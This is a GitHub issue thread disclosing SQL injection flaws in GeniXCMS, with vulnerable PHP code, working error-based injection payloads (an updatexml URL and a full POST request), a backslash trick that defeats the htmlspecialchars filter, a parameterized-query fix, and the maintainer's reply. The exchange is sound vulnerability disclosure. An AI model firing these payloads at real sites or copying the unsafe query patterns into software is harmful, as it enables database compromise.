
[sql injection] #61

Closed
l3m0n opened this issue Jan 9, 2017 · 5 comments

Comments

@l3m0n

l3m0n commented Jan 9, 2017

[sql injection]

1. issue1:

    /inc/lib/Control/Backend/posts.control.php

        $data['post'] = Db::result("SELECT * FROM `posts` WHERE `id` = '{$_GET['id']}' ");

    exp1:

        http://lemon.love/code-src/GeniXCMS/GeniXCMS-master/gxadmin/index.php?page=posts&act=edit&id=6' and updatexml(1,(select user()),1)%23&token=Pp52R3oD4wuLBVutgD9hMsMrp8alQD3bKmuf06AI0HZMzoMiRe3s18BUa4eIOqrMqj38Cp9aoQqWaw10

2. issue2:

    /inc/mod/newsletter/options.php

        $usr = Db::result("SELECT * FROM `user` WHERE `group` = '{$_POST['recipient']}'");

    exp2:

        POST /code-src/GeniXCMS/GeniXCMS-master/gxadmin/index.php?page=mods&mod=newsletter HTTP/1.1
        Host: lemon.love
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
        Accept-Encoding: gzip, deflate
        Referer: http://lemon.love/code-src/GeniXCMS/GeniXCMS-master/gxadmin/index.php?page=mods&mod=newsletter
        Cookie: GeniXCMS-I3YZLgqlM9CM33Zi6PBF=f0d4ea594sg6i85ovsgeeg4um1; USER_NAME_COOKIE=admin; SID_1=95aefa9c; GeniXCMS-I3YZLgqlM9CM33Zi6PBF=f0d4ea594sg6i85ovsgeeg4um1; GeniXCMS-Installation=bscpujchn91pl57oj10af4vb45; GeniXCMS-vMIHkJPDSgZrrg3uywYO=48a5t0i0d7bqh4q3toepkckf37
        Connection: close
        Upgrade-Insecure-Requests: 1
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 193

        subject=aaa%40qq.com&recipient=a'+and+updatexml(1,(select+version()),1)%23&type=text&token=x972PTSsrW9U5tCdFGTuRpgsNewA0Ozm3UTaPsh9ixhA3R0O25cRE7FCK3xlyEttm4EUGJXfgb3cCs3H&sendmail=&message=aaa

@l3m0n (Author)

l3m0n commented Jan 9, 2017

I found some unsafe methods that cause a lot of problems.

I hope this helps you.


method issue

Db.class.php

You can see this in Db.class.php: escape is safe.
It is used in insert/update etc., but it is not used in select.

    public static function escape($vars)
    {
        if (DB_DRIVER == 'mysql') {
            $vars = mysql_escape_string($vars);

This program will generally use Typo::cleanX to deal with $_POST/$_GET.

Typo.class.php

    public static function cleanX($c)
    {
        $val = self::strip_tags_content($c, '<script>', true);
        $val = htmlspecialchars(
            $val,
            ENT_QUOTES | ENT_HTML5,
            'utf-8'
        );
        return $val;
    }

It encodes the HTML characters, but \ is not processed, so I can use \ to inject.

function.htmlspecialchars

issue1

Tags.class.php

    public static function exist($tag)
    {
        $tag = Typo::cleanX($tag);
        $sql = "SELECT `name` FROM `cat` WHERE `name` = '{$tag}' OR `slug` = '{$tag}' AND `type` = 'tag'";
        $q = Db::result($sql);
        // echo Db::$num_rows;
        if (Db::$num_rows > 0) {
            return true;
        } else {
            return false;
        }
    }

If $tag is:

    and updatexml(1,(select version()),1)#\

the query becomes:

    SELECT `name` FROM `cat` WHERE `name` = 'and updatexml(1,(select version()),1)#\' OR `slug` = 'and updatexml(1,(select version()),1)#\' AND `type` = 'tag'

and it looks like this:

    SELECT `name` FROM `cat` WHERE `name` = 'xx' and updatexml(1,(select version()),1);

issue2

Db.class.php

    public static function insert($vars)
    {
        if (is_array($vars)) {
            $set = '';
            $k = '';
            foreach ($vars['key'] as $key => $val) {
                $val = self::escape($val);
                $set .= "'{$val}',";
                $k .= "`{$key}`,";
            }

            $set = substr($set, 0, -1);
            $k = substr($k, 0, -1);

            $sql = sprintf('INSERT INTO `%s` (%s) VALUES (%s) ', $vars['table'], $k, $set);
        } else {
            $sql = $vars;
        }
        if (DB_DRIVER == 'mysql') {
            mysql_query('SET CHARACTER SET utf8');
            $q = mysql_query($sql) or die(mysql_error());
            self::$last_id = mysql_insert_id();

Here:

    if (is_array($vars)) {
    } else {
        $sql = $vars;
    }

When $vars is not an array, this will cause security problems, because $val = self::escape($val); can't be executed.

Example:

/inc/lib/Control/Backend/categories.control.php

    if (User::access(1)) {
        $data['sitetitle'] = CATEGORIES;
        switch (isset($_POST['addcat'])) {
            case true:
                // cleanup first
                $slug = Typo::slugify(Typo::cleanX($_POST['cat']));
                $cat = Typo::cleanX($_POST['cat']);

                if (!isset($_POST['token']) || !Token::isExist($_POST['token'])) {
                    // VALIDATE ALL
                    $alertDanger[] = TOKEN_NOT_EXIST;
                }
                if (!isset($_POST['cat']) || $_POST['cat'] == '') {
                    $alertDanger[] = CATEGORY_CANNOT_EMPTY;
                }
                if (isset($alertDanger)) {
                    $data['alertDanger'] = $alertDanger;
                } else {
                    $cat = Db::insert(
                        sprintf(
                            "INSERT INTO `cat` VALUES (null, '%s', '%s', '%d', '', 'post' )",
                            $cat,
                            $slug,
                            Typo::int($_POST['parent'])
                        )
                    );
                    //print_r($cat);
                    $data['alertSuccess'][] = MSG_CATEGORY_ADDED.' '.$_POST['cat'];
                }
                if (isset($_POST['token'])) {
                    Token::remove($_POST['token']);
                }
                break;

            default:
                break;
        }

Here is the security issue:

                $cat = Db::insert(
                    sprintf(
                        "INSERT INTO `cat` VALUES (null, '%s', '%s', '%d', '', 'post' )",
                        $cat,
                        $slug,
                        Typo::int($_POST['parent'])
                    )
                );

Of course, update also has this problem.
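The two reports in this thread (the interpolated `$_GET['id']` and `$_POST['recipient']` queries in the first comment, and the `Typo::cleanX` plus raw-string `Db::insert` path in this one) share one fix: pass user input as bound parameters and never let an HTML encoder stand in for SQL escaping. The block below is an added example written for this thread, not GeniXCMS code. It assumes PDO with an in-memory SQLite database in place of the project's MySQL connection (only the DSN would change on MySQL), and the names `SafeDb`, `loadPost`, `usersInGroup`, `tagExists` and `cleanXKeepsBackslash` are chosen here.

```php
<?php
// Added example for this thread, not GeniXCMS code.
// Assumption: PDO + in-memory SQLite stands in for the project's MySQL
// connection; on MySQL only the DSN changes, the binding code does not.

final class SafeDb
{
    private PDO $pdo;

    public function __construct(PDO $pdo)
    {
        $this->pdo = $pdo;
        $this->pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
        if ($this->pdo->getAttribute(PDO::ATTR_DRIVER_NAME) === 'mysql') {
            // Server-side prepared statements: values are never spliced into SQL text.
            $this->pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
        }
    }

    /** DDL and other statements that carry no user input. */
    public function exec(string $sql): void
    {
        $this->pdo->exec($sql);
    }

    /** Run a SELECT; every user-controlled value goes through $params. */
    public function select(string $sql, array $params = []): array
    {
        $stmt = $this->pdo->prepare($sql);
        $stmt->execute($params);
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    }

    /**
     * Array-only insert. Unlike the Db::insert() quoted above there is no
     * "raw SQL string" branch, so the unescaped path cannot be reached.
     * Identifiers cannot be bound, so table and column names are checked
     * against a strict pattern instead of being trusted.
     */
    public function insert(string $table, array $row): int
    {
        $ident = '/^[A-Za-z_][A-Za-z0-9_]*$/';
        $cols = array_keys($row);
        foreach (array_merge([$table], $cols) as $name) {
            if (!preg_match($ident, (string)$name)) {
                throw new InvalidArgumentException("unsafe identifier: $name");
            }
        }
        $sql = sprintf(
            'INSERT INTO `%s` (`%s`) VALUES (%s)',
            $table,
            implode('`, `', $cols),
            implode(', ', array_fill(0, count($cols), '?'))
        );
        $this->pdo->prepare($sql)->execute(array_values($row));
        return (int)$this->pdo->lastInsertId();
    }
}

// posts.control.php: the id is numeric, so validate it before it reaches SQL at all.
function loadPost(SafeDb $db, array $get): ?array
{
    $id = filter_var($get['id'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // a non-integer id never reaches the database
    }
    $rows = $db->select('SELECT * FROM `posts` WHERE `id` = ?', [$id]);
    return $rows[0] ?? null;
}

// newsletter/options.php: the recipient group is bound, never concatenated.
function usersInGroup(SafeDb $db, string $group): array
{
    return $db->select('SELECT * FROM `user` WHERE `group` = ?', [$group]);
}

// Tags::exist(): cleanX() is dropped (it is an HTML encoder, not an SQL escaper)
// and the value is bound once per placeholder. The parentheses also fix the
// OR/AND precedence of the original WHERE clause (AND binds tighter than OR).
function tagExists(SafeDb $db, string $tag): bool
{
    $rows = $db->select(
        "SELECT `name` FROM `cat` WHERE (`name` = ? OR `slug` = ?) AND `type` = 'tag'",
        [$tag, $tag]
    );
    return count($rows) > 0;
}

// Why cleanX() did not help: htmlspecialchars() leaves '#' and the trailing
// backslash of the reported payload untouched, so the string comes back unchanged.
function cleanXKeepsBackslash(): bool
{
    $payload = "and updatexml(1,(select version()),1)#\\";
    return htmlspecialchars($payload, ENT_QUOTES | ENT_HTML5, 'utf-8') === $payload;
}

$db = new SafeDb(new PDO('sqlite::memory:'));
$db->exec('CREATE TABLE `posts` (`id` INTEGER PRIMARY KEY, `title` TEXT)');
$db->exec('CREATE TABLE `user` (`id` INTEGER PRIMARY KEY, `group` TEXT)');
$db->exec('CREATE TABLE `cat` (`id` INTEGER PRIMARY KEY, `name` TEXT, `slug` TEXT, `type` TEXT)');
$db->insert('cat', ['name' => "O'Reilly", 'slug' => 'oreilly', 'type' => 'tag']); // constructed row

var_dump(tagExists($db, "O'Reilly"));                                  // a quote in data is just data
var_dump(tagExists($db, "and updatexml(1,(select version()),1)#\\"));   // compared literally, no match
var_dump(loadPost($db, ['id' => "6' and updatexml(1,(select user()),1)#"])); // rejected by validation
var_dump(usersInGroup($db, "a' and updatexml(1,(select version()),1)#"));    // empty result, no error
var_dump(cleanXKeepsBackslash());
```

The last check is the point of the second comment in one line: `htmlspecialchars` is an output encoder for HTML contexts and says nothing about SQL string syntax, so the right place for `Typo::cleanX` is at render time, while the database layer binds parameters. Keeping `insert()` array-only also removes the branch the report calls out, where a caller-built SQL string bypasses `escape()` entirely.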

@l3m0n (Author)

l3m0n commented Jan 9, 2017

I would like to apply for a CVE ID, I really hope you can help me.

@attritionorg

First, make sure the issues are legitimate and the vendor has verified them. If they are issues, then you or the vendor can request IDs from https://cveform.mitre.org/.

@TuuuNya

TuuuNya commented Jan 12, 2017

@l3m0n master really handsome

@semplon (Collaborator)

semplon commented Jan 12, 2017

Hello @l3m0n, thanks again for introducing the issues. I'm very excited to know the issues so I can improve GeniXCMS.

[sql injection]

part 1:
About the sql injection part 1: I'm aware of that and am already optimizing the query, and will upload it upon the next commit.

part 2:
Thanks for reporting this; this module hadn't been touched for a long time since I was focusing on the features. I will fix this issue.

Method Issues

Issue 1
Thank you for bringing up this issue, I'll fix it soon.

Issue 2
About this, I'll consider it not an issue. This operation still exists for backward compatibility with the oldest mods and applications I created with old GeniXCMS. That's why, before we assign the SQL value to $vars, it has to be cleaned up first. And thank you for reminding me about this, because in the future this operation will be removed and replaced with the array version.

And yes, as @attritionorg mentioned, for CVE please ask at their website. Just fill in what is necessary.

Once again, thank you for your kind report.
It is more awesome to know that I can improve GeniXCMS.
